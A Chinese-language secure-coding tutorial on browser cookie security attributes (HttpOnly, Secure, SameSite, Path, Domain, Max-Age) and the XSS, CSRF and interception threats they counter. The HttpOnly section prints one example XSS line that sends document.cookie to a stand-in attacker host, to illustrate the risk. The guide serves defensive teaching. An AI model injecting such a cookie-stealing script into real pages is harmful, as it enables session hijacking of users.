在 Web 安全体系中,Cookie 是一个看似简单、却极其关键的组件。它既是登录态、会话管理的核心载体,也是 XSS、CSRF 等攻击最常见的突破口之一。
很多安全事故并不是因为“用了 Cookie”,而是没有正确使用 Cookie 的安全机制。
本文从工程视角出发,系统梳理浏览器 Cookie 的所有关键安全机制,结合攻击模型解释每一个属性存在的真实原因,帮助你在实际开发中写出“不容易出事”的 Cookie 代码。
一、Cookie 的本质:浏览器替你保存的一小段状态
HTTP 是无状态协议,Cookie 的出现,是为了解决一个根本问题:
服务器如何识别“这是同一个用户”?
Cookie 的核心特性只有三点:
- 存储在浏览器
- 每次请求自动携带给服务器
- 受浏览器安全策略严格约束
正是这三点,让 Cookie 成为身份凭证,也同时成为攻击目标。
二、Cookie 面临的主要安全威胁模型
在理解安全属性之前,先明确 Cookie 在现实中会被如何攻击:
1. XSS(跨站脚本攻击)
攻击者通过注入 JavaScript,直接读取 document.cookie。
2. CSRF(跨站请求伪造)
浏览器会在“你不知情的情况下”,自动携带 Cookie 发请求。
3. 中间人攻击(MITM)
在 HTTP 或弱加密场景下,Cookie 可能被窃听或篡改。
4. 会话固定 / 会话劫持
Cookie 生命周期或作用域设置不当,导致登录态被复用。
所有 Cookie 安全属性,都是为了压制这些攻击面而设计的。
三、Cookie 的核心安全属性一览
一个完整、安全的 Cookie,往往至少包含以下属性组合:
Set-Cookie: session_id=abc123;
HttpOnly;
Secure;
SameSite=Lax;
Path=/;
Max-Age=3600
下面逐个拆解这些属性的真实意义。
四、HttpOnly:从根源限制 Cookie 被脚本窃取
HttpOnly 是什么
HttpOnly 是 Cookie 的一个安全属性,用来禁止 JavaScript 访问 Cookie。
一旦设置,该 Cookie 将无法通过 document.cookie 被读取、修改或删除。
Set-Cookie: session_id=abc123; HttpOnly
浏览器层面的行为是明确的:
- Cookie 仍然会自动随 HTTP 请求发送
- 但 JS 运行环境完全感知不到它的存在
HttpOnly 解决的安全问题
HttpOnly 的设计目标非常明确:对抗 XSS 攻击中的 Cookie 窃取行为。
没有 HttpOnly 的典型风险
// 恶意脚本
fetch("https://evil.com/log?c=" + document.cookie);
一旦页面存在 XSS 漏洞,攻击者可以直接获取登录态 Cookie。
启用 HttpOnly 后
document.cookie中 不会出现该 Cookie- 攻击者即使完全控制 JS 执行,也无法读取 Cookie 内容
HttpOnly 的能力边界
HttpOnly 只解决“读取”问题,不解决“使用”问题。
| 场景 | 是否受 HttpOnly 保护 | 说明 |
|---|---|---|
| XSS 读取 Cookie | ✅ | JS 无法访问 |
| XSS 发请求(自动带 Cookie) | ❌ | 浏览器仍会携带 Cookie |
| CSRF 攻击 | ❌ | Cookie 会自动发送 |
换句话说:
HttpOnly 是“防偷看”,不是“防借用”。
实际使用建议
- 所有 登录态 / 会话类 Cookie 必须启用 HttpOnly
- 任何需要前端读取的数据,不应放入 Cookie
- JWT 若存 Cookie 中,必须加 HttpOnly,否则等同于明文暴露
五、Secure:限制 Cookie 只在 HTTPS 中传输
Secure 是什么
Secure 属性表示:
Cookie 仅在 HTTPS 请求中发送,HTTP 请求一律不携带。
Set-Cookie: session_id=abc123; Secure
这是浏览器层面的硬性规则,不受前端或后端逻辑影响。
Secure 解决的安全问题
Secure 的核心目标是:防止 Cookie 在传输过程中被窃听或篡改。
没有 Secure 的风险
- 用户访问
http://example.com - Cookie 明文传输
- 中间人可直接抓包获取 Cookie
启用 Secure 后
- 浏览器在 HTTP 请求中直接忽略该 Cookie
- 只有 HTTPS 才会携带
Secure 的强制联动规则
在现代浏览器中:
SameSite=None必须配合Secure- 否则浏览器直接拒绝设置 Cookie
Set-Cookie: id=123; SameSite=None
# 会被浏览器丢弃
实际使用建议
- 生产环境 Cookie 必须开启 Secure
- HTTPS 不是可选项,是 Cookie 安全的前置条件
- 本地开发可使用 localhost 特例,但上线前必须统一修正
六、SameSite:从浏览器层面拦截 CSRF
SameSite 的设计目的
SameSite 是 Cookie 的一个安全属性,用来限制跨站请求时 Cookie 是否被携带,核心目标是防范 CSRF(跨站请求伪造)攻击。
它有三个取值:
Strict:仅在同站请求时携带Lax:宽松模式,部分跨站请求可携带None:不限制,允许跨站携带(必须配合 Secure)
SameSite=Lax 的具体规则(默认值)
Chrome 80+ 开始,SameSite=Lax 是浏览器默认策略,其规则如下:
- 同站请求
- GET / POST / AJAX
- Cookie 均会正常携带
- 跨站请求
- ❌ 非 GET 方法(POST / PUT / DELETE)不携带
- ❌ AJAX / fetch GET 不携带
- ✅ 顶级导航触发的 GET 请求可携带
场景对照表
假设 Cookie 设置如下:
Set-Cookie: sessionId=123; SameSite=Lax;
| 场景 | 是否携带 Cookie | 说明 |
|---|---|---|
a.com → a.com/api(同站 GET) | ✅ | 同站请求 |
a.com 表单 POST 到自身 | ✅ | 同站请求 |
b.com 点击链接跳转到 a.com | ✅ | 顶级导航 GET |
b.com AJAX GET a.com/api | ❌ | 跨站 AJAX |
b.com 表单 POST 到 a.com | ❌ | 跨站非 GET |
实际使用建议
- 登录态 Cookie 推荐使用
SameSite=Lax - 管理后台可使用
Strict - 只有在明确需要跨站身份时,才使用
None + Secure
七、Path 与 Domain:缩小 Cookie 的暴露半径
Path:路径级别控制
Set-Cookie: token=abc; Path=/api
规则很简单:
- 请求路径以
/api开头时才携带 - 其他路径不会携带
Path 越精确,攻击面越小
Domain:子域共享规则
Set-Cookie: uid=1; Domain=.example.com
www.example.comapi.example.comadmin.example.com
都会收到该 Cookie。
风险在于: 任何一个子域被攻破,Cookie 全部失守。
实际使用建议
- Domain 不要随意设置为根域
- 管理后台与用户站点尽量使用不同主域
- Path 能细就不要粗
八、Expires / Max-Age:控制会话的存活时间
两者区别
Expires:绝对时间,受客户端时间影响Max-Age:相对秒数,浏览器原生支持,优先级更高
Set-Cookie: session=abc; Max-Age=1800
安全意义
- 生命周期越长,被盗后风险越大
- 永久在线 Cookie 是高危配置
实际使用建议
- 登录态 Cookie 设置合理过期时间
- 高风险操作使用短期 Cookie 或一次性 Token
- 定期轮换 Session 标识
九、Cookie ≠ 安全存储:常见错误认知
以下做法极其危险,但现实中非常常见:
- ❌ 在 Cookie 中存用户信息(手机号、角色、权限)
- ❌ 在 Cookie 中存明文 JWT 且无 HttpOnly
- ❌ 用 Cookie 做“前端可信状态”
正确原则只有一句:
Cookie 只能存“引用”,不能存“事实”
十、Cookie 安全配置最佳实践模板
推荐的登录态 Cookie 配置
Set-Cookie: session_id=RANDOM;
HttpOnly;
Secure;
SameSite=Lax;
Path=/;
Max-Age=1800
再配合服务端:
- Session 绑定 User-Agent / IP(软校验)
- 登录态轮换(Rotate Session)
- 敏感操作二次校验
十一、现代趋势:Cookie 正在“收紧”
浏览器正在持续削弱 Cookie 的滥用能力:
- Chrome 默认 SameSite=Lax
- 第三方 Cookie 逐步淘汰
- Partitioned Cookie(CHIPS)
- Storage Access API
这意味着:
未来 Cookie 更安全,但更“难用”
理解底层安全机制,才能跟上这些变化。
